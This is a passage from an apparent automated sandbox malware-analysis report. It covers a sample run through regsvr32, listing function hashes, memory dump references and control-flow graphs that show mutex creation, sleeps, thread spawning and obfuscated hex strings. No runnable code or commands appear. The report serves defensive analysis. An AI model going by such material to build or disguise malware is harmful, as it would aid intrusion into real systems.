                                                                                                                • Opcode ID: cbc02f6a5409519197e0c9820c9d2aef08f34b01e81d4bcd91a01df55d9b73bc
                                                                                                                • Instruction ID: 0c7dd6ab7988b5cc77d134dbec48929201a4fdb6d100820b5d8c0d079827aa1c
                                                                                                                • Opcode Fuzzy Hash: cbc02f6a5409519197e0c9820c9d2aef08f34b01e81d4bcd91a01df55d9b73bc
                                                                                                                • Instruction Fuzzy Hash: 8B5130B2A1978186D620EF55A04076D77B4FB88B90F980139DF8E5BB55CFBCE465CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID: U
                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                • Opcode ID: 4271a1a9dcc19ead190744ce0c02dd34a15e22fdd4a0ed7a1329f3d56b9864eb
                                                                                                                • Instruction ID: 625b1919c8c8b85dd977dc31ad323373240f1b5c1678cf4fef3eab81f86b49a9
                                                                                                                • Opcode Fuzzy Hash: 4271a1a9dcc19ead190744ce0c02dd34a15e22fdd4a0ed7a1329f3d56b9864eb
                                                                                                                • Instruction Fuzzy Hash: 5141C562B19A4182DB20CF65E444BB97761FB98784F894039EE4ED7794DFBCE409CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _handle_errorf
                                                                                                                • String ID: "$powf
                                                                                                                • API String ID: 2315412904-603753351
                                                                                                                • Opcode ID: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
                                                                                                                • Instruction ID: e33b8137b192d64fc626f9aba4fdc627cfa7f7c0c5a5d82846b260938579d277
                                                                                                                • Opcode Fuzzy Hash: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
                                                                                                                • Instruction Fuzzy Hash: 1E4162B3D28680DFD370CF66E480BAAB6A0F799348F141329F74A56998CBBDD554DB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 3.53%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: >>
                                                                                                                • API String ID: 3668304517-2870946365
                                                                                                                • Opcode ID: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
                                                                                                                • Instruction ID: 6ef4068d7b6f800ba7a967b1f6b180a2b465a989349564d9a3538a4d9bd2158e
                                                                                                                • Opcode Fuzzy Hash: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
                                                                                                                • Instruction Fuzzy Hash: BE217FE2A0468181EA04DF65E58876D33A2FB44FC8FD88039DB4E57659DFBCE4A8C344
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _handle_error
                                                                                                                • String ID: "$pow
                                                                                                                • API String ID: 1757819995-713443511
                                                                                                                • Opcode ID: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
                                                                                                                • Instruction ID: fd7269c1857e7dc223428a02533067f773078ad76db6ada027ee93fa42c616c4
                                                                                                                • Opcode Fuzzy Hash: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
                                                                                                                • Instruction Fuzzy Hash: 063172B2D1CA8587D760CF50E040B6BBAA0FBDA344F141329F68A5A954DBFDE185DF00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.47%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CompareStringtry_get_function
                                                                                                                • String ID: CompareStringEx
                                                                                                                • API String ID: 3328479835-2590796910
                                                                                                                • Opcode ID: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
                                                                                                                • Instruction ID: ef2906417250c99f2a59c88abb8bf0a763cc52c5af9543cb98a202d146a5c891
                                                                                                                • Opcode Fuzzy Hash: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
                                                                                                                • Instruction Fuzzy Hash: 5A112175608B8186D760CB55B4407AAB7A0FB89790F584139EECE93B19DF7CE544CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 5.06%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Stringtry_get_function
                                                                                                                • String ID: LCMapStringEx
                                                                                                                • API String ID: 2588686239-3893581201
                                                                                                                • Opcode ID: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
                                                                                                                • Instruction ID: b3fffa1208d716b76968909db200f4bebc5b0dc66853285539bc32db1b454081
                                                                                                                • Opcode Fuzzy Hash: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
                                                                                                                • Instruction Fuzzy Hash: 48113076608B8186D760CB45F4407AAB7A1F788B90F984139EECE93B59CF7CE445CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 3.32%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                • Opcode ID: 4b2abc229b787bd2aa37325733de34257fbf421e309b557da95ae71b0bce365c
                                                                                                                • Instruction ID: 75a6dbfb736feaf3b7731d00ede2317a178583b48f2d0ad8033df6f5ed0520a0
                                                                                                                • Opcode Fuzzy Hash: 4b2abc229b787bd2aa37325733de34257fbf421e309b557da95ae71b0bce365c
                                                                                                                • Instruction Fuzzy Hash: 5B113D72608B8192EB208F15E4406A97BA4FB88B84F5C4274EE8E5B758DF7CE955C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                • String ID: InitializeCriticalSectionEx
                                                                                                                • API String ID: 539475747-3084827643
                                                                                                                • Opcode ID: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
                                                                                                                • Instruction ID: 570434c89e3778e1bce9dfb58f2bf5524118e45818c0e204cba8ae4842001622
                                                                                                                • Opcode Fuzzy Hash: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
                                                                                                                • Instruction Fuzzy Hash: A6F090A2F1864182EB14CB81B440A752620BF48B80FCD407DEA1F63745CEACF45DC780
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 2.28%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Valuetry_get_function
                                                                                                                • String ID: FlsSetValue
                                                                                                                • API String ID: 738293619-3750699315
                                                                                                                • Opcode ID: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
                                                                                                                • Instruction ID: 5ce8a4b6eb1a0b0818d79ac37b826339a2d24d0d1f09e9bdb8dacbd6c83c0758
                                                                                                                • Opcode Fuzzy Hash: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
                                                                                                                • Instruction Fuzzy Hash: 97E037E2A0854292EB14CB91A400BB52621BF48780FCD403DE51F56255CEADF49DC650
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.69%

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseConcurrency::cancel_current_taskCreateDirectoryExitProcess
                                                                                                                • String ID: /s "$370d6e253a3a93578a1081bc37558c01722c167025728cb4506e8b5b00$384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$?$a337e267db176c5fb3deb0ceddc5345fe682342094e5fde3258f50cb66c792b97f$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f$c49ff0c512b63183b3b9933942f35f3b9767f14025f2b157b84cb6ecdc406c389a71dd4f34ecb955915b94eed958752b816acc6c0cc9917da04584c8e458693190
                                                                                                                • API String ID: 4181945512-2298773885
                                                                                                                • Opcode ID: a4f7777331c9b74bce972c0d2823af234df58c92108e7d5fe7473dbe204aaac6
                                                                                                                • Instruction ID: ae9e290d892cb53bc7a7d64a6751b41d7278d38f3d15f4245a0e2faeddefe74b
                                                                                                                • Opcode Fuzzy Hash: a4f7777331c9b74bce972c0d2823af234df58c92108e7d5fe7473dbe204aaac6
                                                                                                                • Instruction Fuzzy Hash: FB8289A2B1478185EF00DBB5D4847AD2361FB417A4F949239EA6D67AE9DFBCF049C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2952 7ff983d279b0-7ff983d27a3d call 7ff983d27eb0 Sleep call 7ff983d081a0 call 7ff983d1b330 2959 7ff983d27a3f 2952->2959 2960 7ff983d27a42-7ff983d27a5f CreateMutexExW call 7ff983d53098 2952->2960 2959->2960 2963 7ff983d27aac-7ff983d27ab4 2960->2963 2964 7ff983d27a61-7ff983d27a73 CloseHandle 2960->2964 2967 7ff983d27aeb 2963->2967 2968 7ff983d27ab6-7ff983d27ac8 2963->2968 2965 7ff983d27aee-7ff983d27b09 2964->2965 2966 7ff983d27a75-7ff983d27a87 2964->2966 2969 7ff983d27b0b-7ff983d27b21 2965->2969 2970 7ff983d27b41-7ff983d27b43 2965->2970 2971 7ff983d27a89-7ff983d27a9c 2966->2971 2972 7ff983d27aa5-7ff983d27aaa call 7ff983d295b0 2966->2972 2967->2965 2973 7ff983d27aca-7ff983d27add 2968->2973 2974 7ff983d27ae6 call 7ff983d295b0 2968->2974 2975 7ff983d27b3c call 7ff983d295b0 2969->2975 2976 7ff983d27b23-7ff983d27b36 2969->2976 2979 7ff983d27b49-7ff983d27b50 call 7ff983d02610 2970->2979 2980 7ff983d27e54-7ff983d27e7c call 7ff983d292f0 2970->2980 2977 7ff983d27e89-7ff983d27e8e call 7ff983d2e0ec 2971->2977 2978 7ff983d27aa2 2971->2978 2972->2965 2973->2977 2982 7ff983d27ae3 2973->2982 2974->2967 2975->2970 2976->2975 2984 7ff983d27e83-7ff983d27e88 call 7ff983d2e0ec 2976->2984 2997 7ff983d27e8f-7ff983d27e94 call 7ff983d2e0ec 2977->2997 2978->2972 2995 7ff983d27d3e-7ff983d27d45 call 7ff983d02580 2979->2995 2996 7ff983d27b56-7ff983d27b5d call 7ff983d02580 2979->2996 2982->2974 2984->2977 3005 7ff983d27d4c-7ff983d27e3d CreateThread CloseHandle CreateThread CloseHandle CreateThread CloseHandle CreateThread CloseHandle CreateThread CloseHandle CreateThread CloseHandle 2995->3005 3006 7ff983d27d47 call 7ff983d029a0 2995->3006 2996->2995 3004 7ff983d27b63-7ff983d27baf call 7ff983d081a0 call 7ff983d1b330 2996->3004 3007 7ff983d27e95-7ff983d27e9a call 7ff983d2e0ec 2997->3007 3019 7ff983d27bb1 3004->3019 3020 7ff983d27bb4-7ff983d27bd0 call 7ff983d1b6d0 3004->3020 3005->2980 3009 7ff983d27e3f 3005->3009 3006->3005 3015 7ff983d27e9b-7ff983d27ea0 call 7ff983d2e0ec 3007->3015 3013 7ff983d27e40-7ff983d27e52 Sleep 3009->3013 3013->2980 3013->3013 3023 7ff983d27ea1-7ff983d27ea6 call 7ff983d2e0ec 3015->3023 3019->3020 3026 7ff983d27c09-7ff983d27c11 3020->3026 3027 7ff983d27bd2-7ff983d27be8 3020->3027 3031 7ff983d27c49-7ff983d27c62 3026->3031 3032 7ff983d27c13-7ff983d27c29 3026->3032 3029 7ff983d27bea-7ff983d27bfd 3027->3029 3030 7ff983d27c03-7ff983d27c08 call 7ff983d295b0 3027->3030 3029->2997 3029->3030 3030->3026 3036 7ff983d27c9a-7ff983d27cb2 call 7ff983d022e0 3031->3036 3037 7ff983d27c64-7ff983d27c7a 3031->3037 3034 7ff983d27c2b-7ff983d27c3e 3032->3034 3035 7ff983d27c44 call 7ff983d295b0 3032->3035 3034->3007 3034->3035 3035->3031 3045 7ff983d27cb4-7ff983d27cc5 3036->3045 3046 7ff983d27ce5-7ff983d27cf7 ExitProcess 3036->3046 3038 7ff983d27c7c-7ff983d27c8f 3037->3038 3039 7ff983d27c95 call 7ff983d295b0 3037->3039 3038->3015 3038->3039 3039->3036 3047 7ff983d27ce0 call 7ff983d295b0 3045->3047 3048 7ff983d27cc7-7ff983d27cda 3045->3048 3047->3046 3048->3023 3048->3047
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef, xrefs: 00007FF983D27A10
                                                                                                                • 842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9, xrefs: 00007FF983D27B7A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseCreateErrorExitHandleLastMutexProcessSleep
                                                                                                                • String ID: 651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef$842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9
                                                                                                                • API String ID: 1555049902-3969698901
                                                                                                                • Opcode ID: 6130f8192cf7a1099335397721d12142da09d362e5318939c57dade5d5abc463
                                                                                                                • Instruction ID: e106777066ef0de098bdc339d652128945d3edb6c2f188c8ccf91e95290ecbe8
                                                                                                                • Opcode Fuzzy Hash: 6130f8192cf7a1099335397721d12142da09d362e5318939c57dade5d5abc463
                                                                                                                • Instruction Fuzzy Hash: 09D1C2E2B0564282EB14DBF2D4587AD2362FB44B94F844539DA1EA7AD9DFBCF148C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3050 7ff983d272c0-7ff983d27405 call 7ff983d081a0 * 4 call 7ff983d0cea0 call 7ff983d081a0 call 7ff983d1b330 3065 7ff983d2743d-7ff983d2747a call 7ff983d081a0 call 7ff983d1b330 3050->3065 3066 7ff983d27407-7ff983d2741d 3050->3066 3077 7ff983d2747c-7ff983d27492 3065->3077 3078 7ff983d274b2-7ff983d27503 call 7ff983d2b450 SHGetFolderPathW call 7ff983d081a0 3065->3078 3067 7ff983d2741f-7ff983d27432 3066->3067 3068 7ff983d27438 call 7ff983d295b0 3066->3068 3067->3068 3070 7ff983d2798e-7ff983d27993 call 7ff983d2e0ec 3067->3070 3068->3065 3079 7ff983d274ad call 7ff983d295b0 3077->3079 3080 7ff983d27494-7ff983d274a7 3077->3080 3088 7ff983d27508-7ff983d2752e call 7ff983d1b330 3078->3088 3079->3078 3080->3079 3082 7ff983d27988-7ff983d2798d call 7ff983d2e0ec 3080->3082 3082->3070 3091 7ff983d27535-7ff983d2753e 3088->3091 3091->3091 3092 7ff983d27540-7ff983d275b7 call 7ff983d081a0 call 7ff983d03730 call 7ff983d03420 call 7ff983d03630 3091->3092 3101 7ff983d275b9-7ff983d275d0 3092->3101 3102 7ff983d275f0-7ff983d2760b 3092->3102 3103 7ff983d275eb call 7ff983d295b0 3101->3103 3104 7ff983d275d2-7ff983d275e5 3101->3104 3105 7ff983d2760d-7ff983d27624 3102->3105 3106 7ff983d27645-7ff983d2764d 3102->3106 3103->3102 3104->3103 3109 7ff983d2795e-7ff983d27963 call 7ff983d2e0ec 3104->3109 3111 7ff983d2763f-7ff983d27644 call 7ff983d295b0 3105->3111 3112 7ff983d27626-7ff983d27639 3105->3112 3107 7ff983d2764f-7ff983d27665 3106->3107 3108 7ff983d27685-7ff983d2769d 3106->3108 3113 7ff983d27680 call 7ff983d295b0 3107->3113 3114 7ff983d27667-7ff983d2767a 3107->3114 3116 7ff983d2769f-7ff983d276b5 3108->3116 3117 7ff983d276d5-7ff983d276ee 3108->3117 3118 7ff983d27964-7ff983d27969 call 7ff983d2e0ec 3109->3118 3111->3106 3112->3111 3112->3118 3113->3108 3114->3113 3120 7ff983d2796a-7ff983d2796f call 7ff983d2e0ec 3114->3120 3124 7ff983d276d0 call 7ff983d295b0 3116->3124 3125 7ff983d276b7-7ff983d276ca 3116->3125 3126 7ff983d276f0-7ff983d27707 3117->3126 3127 7ff983d27727-7ff983d27732 3117->3127 3118->3120 3131 7ff983d27970-7ff983d27975 call 7ff983d2e0ec 3120->3131 3124->3117 3125->3124 3125->3131 3133 7ff983d27709-7ff983d2771c 3126->3133 3134 7ff983d27722 call 7ff983d295b0 3126->3134 3135 7ff983d2774b-7ff983d27756 3127->3135 3136 7ff983d27734-7ff983d27746 call 7ff983d081a0 3127->3136 3142 7ff983d27976-7ff983d2797b call 7ff983d2e0ec 3131->3142 3133->3134 3133->3142 3134->3127 3138 7ff983d2776f-7ff983d277bd call 7ff983d081a0 call 7ff983d1b330 call 7ff983d04fb0 3135->3138 3139 7ff983d27758-7ff983d2776a call 7ff983d081a0 3135->3139 3136->3135 3159 7ff983d277bf-7ff983d277d6 3138->3159 3160 7ff983d277f6-7ff983d27810 3138->3160 3139->3138 3151 7ff983d2797c-7ff983d27981 call 7ff983d2e0ec 3142->3151 3156 7ff983d27982-7ff983d27987 call 7ff983d2e0ec 3151->3156 3156->3082 3164 7ff983d277f1 call 7ff983d295b0 3159->3164 3165 7ff983d277d8-7ff983d277eb 3159->3165 3161 7ff983d27849-7ff983d27854 3160->3161 3162 7ff983d27812-7ff983d27829 3160->3162 3168 7ff983d2786e-7ff983d27876 3161->3168 3169 7ff983d27856-7ff983d2786d call 7ff983d081a0 3161->3169 3166 7ff983d2782b-7ff983d2783e 3162->3166 3167 7ff983d27844 call 7ff983d295b0 3162->3167 3164->3160 3165->3151 3165->3164 3166->3156 3166->3167 3167->3161 3173 7ff983d278af-7ff983d278b7 3168->3173 3174 7ff983d27878-7ff983d2788e 3168->3174 3169->3168 3178 7ff983d278b9-7ff983d278cf 3173->3178 3179 7ff983d278f0-7ff983d278f8 3173->3179 3176 7ff983d278a9-7ff983d278ae call 7ff983d295b0 3174->3176 3177 7ff983d27890-7ff983d278a3 3174->3177 3176->3173 3177->3082 3177->3176 3180 7ff983d278ea-7ff983d278ef call 7ff983d295b0 3178->3180 3181 7ff983d278d1-7ff983d278e4 3178->3181 3182 7ff983d278fa-7ff983d27910 3179->3182 3183 7ff983d2792d-7ff983d27957 call 7ff983d292f0 3179->3183 3180->3179 3181->3070 3181->3180 3186 7ff983d27912-7ff983d27925 3182->3186 3187 7ff983d27927-7ff983d2792c call 7ff983d295b0 3182->3187 3186->3187 3191 7ff983d27958-7ff983d2795d call 7ff983d2e0ec 3186->3191 3187->3183 3191->3109
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3, xrefs: 00007FF983D274F7
                                                                                                                • 413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432, xrefs: 00007FF983D273DE
                                                                                                                • 41352f26a97e153f7b3157b47315edb36e, xrefs: 00007FF983D27453
                                                                                                                • b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347, xrefs: 00007FF983D27788
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
